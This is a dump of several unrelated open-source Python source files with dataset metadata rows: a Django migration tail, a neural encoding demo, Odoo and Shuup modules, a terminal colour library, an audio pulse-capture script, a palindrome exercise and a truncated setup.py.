'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'detectors.annotatedimage': {
'Meta': {'object_name': 'AnnotatedImage'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'box_height': ('django.db.models.fields.FloatField', [], {}),
'box_width': ('django.db.models.fields.FloatField', [], {}),
'box_x': ('django.db.models.fields.FloatField', [], {}),
'box_y': ('django.db.models.fields.FloatField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'detector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_height': ('django.db.models.fields.PositiveSmallIntegerField', [], {'blank': 'True'}),
'image_jpeg': ('django.db.models.fields.files.ImageField', [], {'default': "'average_image/default.jpg'", 'max_length': '100'}),
'image_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'blank': 'True'}),
'location_latitude': ('django.db.models.fields.FloatField', [], {}),
'location_longitude': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionW': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionX': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionY': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionZ': ('django.db.models.fields.FloatField', [], {}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'detectors.detector': {
'Meta': {'ordering': "('created_at',)", 'object_name': 'Detector'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'average_image': ('django.db.models.fields.files.ImageField', [], {'default': "'defaults/default.png'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hash_value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']", 'null': 'True', 'blank': 'True'}),
'sizes': ('django.db.models.fields.TextField', [], {}),
'support_vectors': ('django.db.models.fields.TextField', [], {}),
'target_class': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'training_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'weights': ('django.db.models.fields.TextField', [], {})
},
u'detectors.rating': {
'Meta': {'object_name': 'Rating'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'detector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rating': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
}
}
complete_apps = ['detectors'] | mit | 324,546,438,016,698,240 | 72.316239 | 187 | 0.558237 | false |
bionet/ted.python | demos/iaf_delay_demo.py | 1 | 3443 | #!/usr/bin/env python
"""
Demos of MIMO time encoding and decoding algorithms that use IAF
neurons with delays.
"""
# Copyright (c) 2009-2015, Lev Givon
# All rights reserved.
# Distributed under the terms of the BSD license:
# http://www.opensource.org/licenses/bsd-license
import numpy as np
# Set matplotlib backend so that plots can be generated without a
# display:
import matplotlib
matplotlib.use('AGG')
from bionet.utils.misc import func_timer
import bionet.utils.band_limited as bl
import bionet.utils.plotting as pl
import bionet.ted.iaf as iaf
# For determining output plot file names:
output_name = 'iaf_delay_demo_'
output_count = 0
output_ext = '.png'
# Define input signal generation parameters:
T = 0.05
dur = 2*T
dt = 1e-6
f = 100
bw = 2*np.pi*f
np.random.seed(0)
noise_power = None
comps = 8
if noise_power == None:
fig_title = 'IAF Input Signal with No Noise'
else:
fig_title = 'IAF Input Signal with %d dB of Noise' % noise_power
M = 3 # number of input signals
N = 9 # number of neurons
# Starting and ending points of interval that is encoded:
t_start = 0.02
t_end = t_start+T
if t_end > dur:
raise ValueError('t_start is too large')
k_start = int(np.round(t_start/dt))
k_end = int(np.round(t_end/dt))
t_enc = np.arange(k_start, k_end, dtype=np.float)*dt
u_list = []
for i in xrange(M):
fig_title_in = fig_title + ' (Signal #' + str(i+1) + ')'
print fig_title_in
u = func_timer(bl.gen_band_limited)(dur, dt, f, noise_power, comps)
u /= max(u)
u *= 1.5
pl.plot_signal(t_enc, u[k_start:k_end], fig_title_in,
output_name + str(output_count) + output_ext)
u_list.append(u)
output_count += 1
t = np.arange(len(u_list[0]), dtype=np.float)*dt
# Define neuron parameters:
def randu(a, b, *d):
"""Create an array of the given shape and propagate it with random
samples from a uniform distribution over ``[a, b)``."""
if a >= b:
raise ValueError('b must exceed a')
return a+(b-a)*np.random.rand(*d)
b_list = list(randu(2.3, 3.3, N))
d_list = list(randu(0.15, 0.25, N))
k_list = list(0.01*np.ones(N))
a_list = map(list, np.reshape(np.random.exponential(0.003, N*M), (N, M)))
w_list = map(list, np.reshape(randu(0.5, 1.0, N*M), (N, M)))
fig_title = 'Signal Encoded Using Delayed IAF Encoder'
print fig_title
s_list = func_timer(iaf.iaf_encode_delay)(u_list, t_start, dt, b_list, d_list,
k_list, a_list, w_list)
for i in xrange(M):
for j in xrange(N):
fig_title_out = fig_title + '\n(Signal #' + str(i+1) + \
', Neuron #' + str(j+1) + ')'
pl.plot_encoded(t_enc, u_list[i][k_start:k_end],
s_list[j][np.cumsum(s_list[j])<T],
fig_title_out,
output_name + str(output_count) + output_ext)
output_count += 1
fig_title = 'Signal Decoded Using Delayed IAF Decoder'
print fig_title
u_rec_list = func_timer(iaf.iaf_decode_delay)(s_list, T, dt,
b_list, d_list, k_list,
a_list, w_list)
for i in xrange(M):
fig_title_out = fig_title + ' (Signal #' + str(i+1) + ')'
pl.plot_compare(t_enc, u_list[i][k_start:k_end],
u_rec_list[i][0:k_end-k_start], fig_title_out,
output_name + str(output_count) + output_ext)
output_count += 1
| bsd-3-clause | 3,058,591,314,712,588,300 | 29.469027 | 78 | 0.600349 | false |
hivam/doctor_psychology | models/doctor_hc_report_psicologia_inherit.py | 1 | 1378 | # -*- encoding: utf-8 -*-
# #############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
import logging
_logger = logging.getLogger(__name__)
import base64
import sys, os
class doctor_hc_report_inherit(osv.osv):
_inherit = "doctor.list_report"
_columns = {
'attentions_psychology_ids': fields.one2many('doctor.psicologia', 'list_report_print_spicologia_id', 'Attentions'),
}
doctor_hc_report_inherit()
| agpl-3.0 | -6,713,229,931,846,211,000 | 36.243243 | 117 | 0.640058 | false |
groboclown/whimbrel | installer/whimbrel/install/util/termcolor.py | 1 | 8654 | """
A Windows and ANSII coloring library.
"""
from sys import stdout
__ALL__ = ['out', 'outln']
VERSION = (1, 0, 0)
try:
# Colors text in console mode application (win32).
# Uses ctypes and Win32 methods SetConsoleTextAttribute and
# GetConsoleScreenBufferInfo.
#
# source: https://www.burgaud.com/bring-colors-to-the-windows-console-with-python/
#
# $Id: color_console.py 534 2009-05-10 04:00:59Z andre $
from ctypes import windll, Structure, c_short, c_ushort, byref
SHORT = c_short
WORD = c_ushort
class COORD(Structure):
"""struct in wincon.h."""
_fields_ = [
("X", SHORT),
("Y", SHORT)
]
class SMALL_RECT(Structure):
"""struct in wincon.h."""
_fields_ = [
("Left", SHORT),
("Top", SHORT),
("Right", SHORT),
("Bottom", SHORT)
]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", COORD)
]
# winbase.h
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h
FOREGROUND_BLACK = 0x0000
FOREGROUND_BLUE = 0x0001
FOREGROUND_GREEN = 0x0002
FOREGROUND_CYAN = 0x0003
FOREGROUND_RED = 0x0004
FOREGROUND_MAGENTA = 0x0005
FOREGROUND_YELLOW = 0x0006
FOREGROUND_GREY = 0x0007
FOREGROUND_INTENSITY = 0x0008 # foreground color is intensified.
BACKGROUND_BLACK = 0x0000
BACKGROUND_BLUE = 0x0010
BACKGROUND_GREEN = 0x0020
BACKGROUND_CYAN = 0x0030
BACKGROUND_RED = 0x0040
BACKGROUND_MAGENTA = 0x0050
BACKGROUND_YELLOW = 0x0060
BACKGROUND_GREY = 0x0070
BACKGROUND_INTENSITY = 0x0080 # background color is intensified.
stdout_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
def get_text_attr():
"""Returns the character attributes (colors) of the console screen
buffer."""
csbi = CONSOLE_SCREEN_BUFFER_INFO()
GetConsoleScreenBufferInfo(stdout_handle, byref(csbi))
return csbi.wAttributes
def set_text_attr(color):
"""Sets the character attributes (colors) of the console screen
buffer. Color is a combination of foreground and background color,
foreground and background intensity."""
SetConsoleTextAttribute(stdout_handle, color)
HIGHLIGHTS = {
'on_grey': BACKGROUND_GREY,
'on_red': BACKGROUND_RED,
'on_green': BACKGROUND_GREEN,
'on_yellow': BACKGROUND_YELLOW,
'on_blue': BACKGROUND_BLUE,
'on_magenta': BACKGROUND_MAGENTA,
'on_cyan': BACKGROUND_CYAN,
'on_black': BACKGROUND_BLACK
}
BOLD = FOREGROUND_INTENSITY
COLORS = {
'grey': FOREGROUND_GREY,
'red': FOREGROUND_RED,
'green': FOREGROUND_GREEN,
'yellow': FOREGROUND_YELLOW,
'blue': FOREGROUND_BLUE,
'magenta': FOREGROUND_MAGENTA,
'cyan': FOREGROUND_CYAN,
'black': FOREGROUND_BLACK,
}
DEFAULT_COLORS = get_text_attr()
DEFAULT_BACKGROUND = DEFAULT_COLORS & 0x00f0
DEFAULT_FOREGROUND = DEFAULT_COLORS & 0x000f
def set_color(val):
assert isinstance(val, int)
set_text_attr(val)
def set_default_colors():
set_color(DEFAULT_COLORS)
def colored(text, color=None, on_color=None, attrs=None):
color_index = 0
if color not in COLORS:
color_index |= DEFAULT_FOREGROUND
else:
color_index |= COLORS[color]
if on_color not in HIGHLIGHTS:
color_index |= DEFAULT_BACKGROUND
else:
color_index |= HIGHLIGHTS[on_color]
if attrs is not None:
for attr in attrs:
if attr == 'bold':
color_index |= BOLD
return str(text), color_index
def out(*text):
if isinstance(text, str):
set_default_colors()
stdout.write(text)
return
for c in text:
if isinstance(c, str):
set_default_colors()
stdout.write(c)
else:
assert isinstance(c, tuple) or isinstance(c, list)
assert len(c) == 2
assert isinstance(c[0], str)
assert isinstance(c[1], int)
set_color(c[1])
stdout.write(c[0])
set_default_colors()
except ImportError:
# from the great "termcolor.py" library.
# Copyright (c) 2008-2011 Volvox Development Team
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Author: Konstantin Lepa <[email protected]>
import os
ATTRIBUTES = dict(
list(zip([
'bold',
'dark',
'',
'underline',
'blink',
'',
'reverse',
'concealed'
],
list(range(1, 9))
))
)
del ATTRIBUTES['']
HIGHLIGHTS = dict(
list(zip([
'on_black',
'on_red',
'on_green',
'on_yellow',
'on_blue',
'on_magenta',
'on_cyan',
'on_grey'
],
list(range(40, 48))
))
)
COLORS = dict(
list(zip([
'black',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'grey',
],
list(range(30, 38))
))
)
RESET = '\033[0m'
def colored(text, color=None, on_color=None, attrs=None):
"""Colorize text.
Available text colors:
red, green, yellow, blue, magenta, cyan, white.
Available text highlights:
on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white.
Available attributes:
bold, dark, underline, blink, reverse, concealed.
Example:
colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])
colored('Hello, World!', 'green')
:param text: text to format in the requested color
:param color: font color
:param on_color: background color
:param attrs: additional font attributes
"""
if os.getenv('ANSI_COLORS_DISABLED') is None:
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
if on_color is not None:
text = fmt_str % (HIGHLIGHTS[on_color], text)
if attrs is not None:
for attr in attrs:
text = fmt_str % (ATTRIBUTES[attr], text)
text += RESET
return text
def out(*text):
if isinstance(text, str):
stdout.write(text)
else:
for c in text:
stdout.write(str(c))
stdout.flush()
def outln(*text):
out(*text)
stdout.write("\n")
| apache-2.0 | 5,236,865,429,722,387,000 | 28.435374 | 86 | 0.547608 | false |
JohnDMcMaster/uvscada | nuc/gscsv.py | 1 | 1553 | #!/usr/bin/env python
import time
import argparse
import json
from uvscada.nuc import pulser
from uvscada.nuc import alsa_util
def cap(jf):
def jput(j):
jf.write(json.dumps(j, sort_keys=True) + '\n')
print 'Configuring ALSA'
asrc = alsa_util.ALSASrc()
print 'looping'
# 400 w/o, 7300 w/ Cs-137 (1 uCi)
psr = pulser.PHA(phi=200, plo=50)
agen = asrc.gen()
stat = pulser.PulserStat(tprint=args.tprint)
t0 = time.time()
while True:
sample = agen.next()
pulse = psr.next(sample)
stat.next(sample, pulse)
if pulse:
jput({'t': time.time(), 'n': stat.pulses, 'v': pulse})
if args.verbose:
print '% 6d: % 5.1f' % (stat.pulses, pulse)
if args.time and time.time() - t0 > args.time:
print 'Break on time'
break
if args.number and stat.pulses > args.number:
print 'Break on pulses'
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Replay captured USB packets')
parser.add_argument('--verbose', '-v', action='store_true', help='verbose')
parser.add_argument('--tprint', '-p', type=int, default=3, help='Print interval')
parser.add_argument('--time', '-t', type=int, default=0, help='Help')
parser.add_argument('--number', '-n', type=int, default=0, help='Help')
parser.add_argument('fn', nargs='?', default='out.jl', help='csv out')
args = parser.parse_args()
cap(open(args.fn, 'w'))
| bsd-2-clause | -2,728,910,544,904,184,000 | 28.865385 | 85 | 0.576304 | false |
davivcgarcia/python-dcc-ufrj | Exercicios - Lista Paulo Roma/Lista 1/ex4.py | 1 | 1158 | #! /usr/bin/env python
# coding: utf-8
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Autor: Davi Vercillo C. Garcia
# Data: 24/01/2009
# Objetivo: Verificar se uma palavra é palíndroma.
#
def main():
palavra = raw_input("Insira uma palavra: ")
palavra = list(palavra)
palavra_ao_contrario = palavra + []
palavra_ao_contrario.reverse()
if palavra == palavra_ao_contrario:
print "É palíndromo !"
else:
print "Não é palíndromo !"
return 0
if __name__ == "__main__":
main()
| gpl-3.0 | -2,848,325,380,548,143,600 | 30.972222 | 74 | 0.677672 | false |
suutari/shoop | shuup/admin/modules/orders/json_order_creator.py | 1 | 15127 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from copy import deepcopy
from django import forms
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.utils.translation import ugettext as _
from shuup.core.models import (
CompanyContact, Contact, MutableAddress, OrderLineType, OrderStatus,
PaymentMethod, PersonContact, Product, ShippingMethod, Shop
)
from shuup.core.order_creator import OrderCreator, OrderModifier, OrderSource
from shuup.core.order_creator._source import LineSource
from shuup.utils.analog import LogEntryKind
from shuup.utils.numbers import nickel_round, parse_decimal_string
class AdminOrderSource(OrderSource):
def get_validation_errors(self):
return []
def is_cash_order(self):
return (self.payment_method and self.payment_method.choice_identifier == "cash")
class AdminOrderCreator(OrderCreator):
def _check_orderability(self, order_line):
return
class AdminOrderModifier(OrderModifier):
def _check_orderability(self, order_line):
return
class JsonOrderCreator(object):
def __init__(self):
self._errors = []
@staticmethod
def safe_get_first(model, **lookup):
# A little helper function to clean up the code below.
return model.objects.filter(**lookup).first()
def add_error(self, error):
self._errors.append(error)
@property
def is_valid(self):
return not self._errors
@property
def errors(self):
return tuple(self._errors)
def _process_line_quantity_and_price(self, source, sline, sl_kwargs):
quantity_val = sline.pop("quantity", None)
try:
sl_kwargs["quantity"] = parse_decimal_string(quantity_val)
except Exception as exc:
msg = _("The quantity '%(quantity)s' (for line %(text)s) is invalid (%(error)s)") % {
"text": sl_kwargs["text"],
"quantity": quantity_val,
"error": exc,
}
self.add_error(ValidationError(msg, code="invalid_quantity"))
return False
is_product = bool(sline.get("type") == "product")
price_val = sline.pop("baseUnitPrice", None) if is_product else sline.pop("unitPrice", None)
try:
sl_kwargs["base_unit_price"] = source.create_price(parse_decimal_string(price_val))
except Exception as exc:
msg = _("The price '%(price)s' (for line %(text)s) is invalid (%(error)s)") % {
"text": sl_kwargs["text"],
"price": price_val,
"error": exc
}
self.add_error(ValidationError(msg, code="invalid_price"))
return False
discount_val = sline.pop("discountAmount", parse_decimal_string(str("0.00")))
try:
sl_kwargs["discount_amount"] = source.create_price(parse_decimal_string(discount_val))
except Exception as exc:
msg = _("The discount '%(discount)s' (for line %(text)s is invalid (%(error)s)") % {
"discount": discount_val,
"text": sl_kwargs["text"],
"error": exc
}
self.add_error(ValidationError(msg, code="invalid_discount"))
return True
def _process_product_line(self, source, sline, sl_kwargs):
product_info = sline.pop("product", None)
if not product_info:
self.add_error(ValidationError(_("Product line does not have a product set."), code="no_product"))
return False
product = self.safe_get_first(Product, pk=product_info["id"])
if not product:
self.add_error(ValidationError(_("Product %s does not exist.") % product_info["id"], code="no_product"))
return False
try:
shop_product = product.get_shop_instance(source.shop)
except ObjectDoesNotExist:
self.add_error(ValidationError((_("Product %(product)s is not available in the %(shop)s shop.") % {
"product": product,
"shop": source.shop
}), code="no_shop_product"))
return False
supplier = shop_product.suppliers.first() # TODO: Allow setting a supplier?
sl_kwargs["product"] = product
sl_kwargs["supplier"] = supplier
sl_kwargs["type"] = OrderLineType.PRODUCT
sl_kwargs["sku"] = product.sku
sl_kwargs["text"] = product.name
return True
def _add_json_line_to_source(self, source, sline):
valid = True
type = sline.get("type")
sl_kwargs = dict(
line_id=sline.pop("id"),
sku=sline.pop("sku", None),
text=sline.pop("text", None),
shop=source.shop,
type=OrderLineType.OTHER # Overridden in the `product` branch
)
if type != "text":
if not self._process_line_quantity_and_price(source, sline, sl_kwargs):
valid = False
if type == "product":
if not self._process_product_line(source, sline, sl_kwargs):
valid = False
if valid:
source.add_line(**sl_kwargs)
def _process_lines(self, source, state):
state_lines = state.pop("lines", [])
if not state_lines:
self.add_error(ValidationError(_("Please add lines to the order."), code="no_lines"))
for sline in state_lines:
try:
self._add_json_line_to_source(source, sline)
except Exception as exc: # pragma: no cover
self.add_error(exc)
def _create_contact_from_address(self, billing_address, is_company):
name = billing_address.get("name", None)
phone = billing_address.get("phone", "")
email = billing_address.get("email", "")
fields = {"name": name, "phone": phone, "email": email}
if is_company:
tax_number = billing_address.get("tax_number", None)
fields.update({"tax_number": tax_number})
customer = CompanyContact(**fields)
else:
customer = PersonContact(**fields)
return customer
def _get_address(self, address, is_company, save):
address_form = forms.modelform_factory(MutableAddress, exclude=[])
address_form_instance = address_form(data=address)
address_form_instance.full_clean()
if not address_form_instance.is_valid():
for field_name, errors in address_form_instance.errors.items():
field_label = address_form_instance.fields[field_name].label
for error_msg in errors:
self.add_error(
ValidationError(
"%(field_label)s: %(error_msg)s",
params={"field_label": field_label, "error_msg": error_msg},
code="invalid_address"
)
)
return None
if is_company and not address_form_instance.cleaned_data["tax_number"]:
self.add_error(ValidationError(_("Tax number is not set for company."), code="no_tax_number"))
return None
if save:
return address_form_instance.save()
return MutableAddress.from_data(address_form_instance.cleaned_data)
def _initialize_source_from_state(self, state, creator, ip_address, save, order_to_update=None):
shop_data = state.pop("shop", None).get("selected", {})
shop = self.safe_get_first(Shop, pk=shop_data.pop("id", None))
if not shop:
self.add_error(ValidationError(_("Please choose a valid shop."), code="no_shop"))
return None
source = AdminOrderSource(shop=shop)
if order_to_update:
source.update_from_order(order_to_update)
customer_data = state.pop("customer", None)
billing_address_data = customer_data.pop("billingAddress", {})
shipping_address_data = (
billing_address_data
if customer_data.pop("shipToBillingAddress", False)
else customer_data.pop("shippingAddress", {}))
is_company = customer_data.pop("isCompany", False)
save_address = customer_data.pop("saveAddress", False)
billing_address = self._get_address(billing_address_data, is_company, save)
if self.errors:
return
shipping_address = self._get_address(shipping_address_data, is_company, save)
if self.errors:
return
customer = self._get_customer(customer_data, billing_address_data, is_company, save)
if not customer:
return
if save and save_address:
customer.default_billing_address = billing_address
customer.default_shipping_address = shipping_address
customer.save()
methods_data = state.pop("methods", None) or {}
shipping_method = methods_data.pop("shippingMethod")
if not shipping_method:
self.add_error(ValidationError(_("Please select shipping method."), code="no_shipping_method"))
payment_method = methods_data.pop("paymentMethod")
if not payment_method:
self.add_error(ValidationError(_("Please select payment method."), code="no_payment_method"))
if self.errors:
return
source.update(
creator=creator,
ip_address=ip_address,
customer=customer,
billing_address=billing_address,
shipping_address=shipping_address,
status=OrderStatus.objects.get_default_initial(),
shipping_method=self.safe_get_first(ShippingMethod, pk=shipping_method.get("id")),
payment_method=self.safe_get_first(PaymentMethod, pk=payment_method.get("id")),
)
return source
def _get_customer(self, customer_data, billing_address_data, is_company, save):
pk = customer_data.get("id")
customer = self.safe_get_first(Contact, pk=pk) if customer_data and pk else None
if not customer:
customer = self._create_contact_from_address(billing_address_data, is_company)
if not customer:
return
if save:
customer.save()
return customer
def _postprocess_order(self, order, state):
comment = (state.pop("comment", None) or "")
if comment:
order.add_log_entry(comment, kind=LogEntryKind.NOTE, user=order.creator)
def create_source_from_state(self, state, creator=None, ip_address=None, save=False, order_to_update=None):
"""
Create an order source from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param creator: Creator user
:type creator: django.contrib.auth.models.User|None
:param save: Flag whether order customer and addresses is saved to database
:type save: boolean
:param order_to_update: Order object to edit
:type order_to_update: shuup.core.models.Order|None
:return: The created order source, or None if something failed along the way
:rtype: OrderSource|None
"""
if not self.is_valid: # pragma: no cover
raise ValueError("Create a new JsonOrderCreator for each order.")
# We'll be mutating the state to make it easier to track we've done everything,
# so it's nice to deepcopy things first.
state = deepcopy(state)
# First, initialize an OrderSource.
source = self._initialize_source_from_state(
state, creator=creator, ip_address=ip_address, save=save, order_to_update=order_to_update)
if not source:
return None
# Then, copy some lines into it.
self._process_lines(source, state)
if not self.is_valid: # If we encountered any errors thus far, don't bother going forward
return None
if not self.is_valid:
return None
if order_to_update:
for code in order_to_update.codes:
source.add_code(code)
if source.is_cash_order():
processor = source.payment_method.payment_processor
taxful_total = source.taxful_total_price
rounded = nickel_round(
taxful_total, quant=processor.rounding_quantize, rounding=processor.rounding_mode.value)
remainder = rounded - taxful_total
line_data = dict(
line_id="rounding",
type=OrderLineType.ROUNDING,
quantity=1,
shop=source.shop,
text="Rounding",
base_unit_price=source.create_price(remainder.value),
tax_class=None,
line_source=LineSource.ADMIN
)
source.add_line(**line_data)
source.get_final_lines()
return source
def create_order_from_state(self, state, creator=None, ip_address=None):
"""
Create an order from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param creator: Creator user
:type creator: django.contrib.auth.models.User|None
:param ip_address: Remote IP address (IPv4 or IPv6)
:type ip_address: str
:return: The created order, or None if something failed along the way
:rtype: Order|None
"""
source = self.create_source_from_state(
state, creator=creator, ip_address=ip_address, save=True)
# Then create an OrderCreator and try to get things done!
creator = AdminOrderCreator()
try:
order = creator.create_order(order_source=source)
self._postprocess_order(order, state)
return order
except Exception as exc: # pragma: no cover
self.add_error(exc)
return
def update_order_from_state(self, state, order_to_update, modified_by=None):
"""
Update an order from a state dict unserialized from JSON.
:param state: State dictionary
:type state: dict
:param order_to_update: Order object to edit
:type order_to_update: shuup.core.models.Order
:return: The created order, or None if something failed along the way
:rtype: Order|None
"""
source = self.create_source_from_state(state, order_to_update=order_to_update, save=True)
if source:
source.modified_by = modified_by
modifier = AdminOrderModifier()
try:
order = modifier.update_order_from_source(order_source=source, order=order_to_update)
self._postprocess_order(order, state)
return order
except Exception as exc:
self.add_error(exc)
return
| agpl-3.0 | -941,524,889,362,125,800 | 38.703412 | 116 | 0.601111 | false |
pyrocko/pyrocko | src/ext/pyavl-1.12/setup.py | 1 | 2116 | # http://pyrocko.org - GPLv3
#
# The Pyrocko Developers, 21st Century
# ---|P------/S----------~Lg----------
# file: setup.py
from distutils.core import setup, Extension
import sys
__VERSION__ = "1.12_1"
laius = """This small C package is comprised of an independent set of
routines dedicated to manipulating AVL trees (files avl.c, avl.h), and of
an extension module for Python that builds upon it (file avlmodule.c) to
provide objects of type 'avl_tree' in Python, which can behave as sorted
containers or sequential lists. For example one can take slices of trees
with the usual syntax. Unlike collectionsmodule.c, avlmodule.c contains
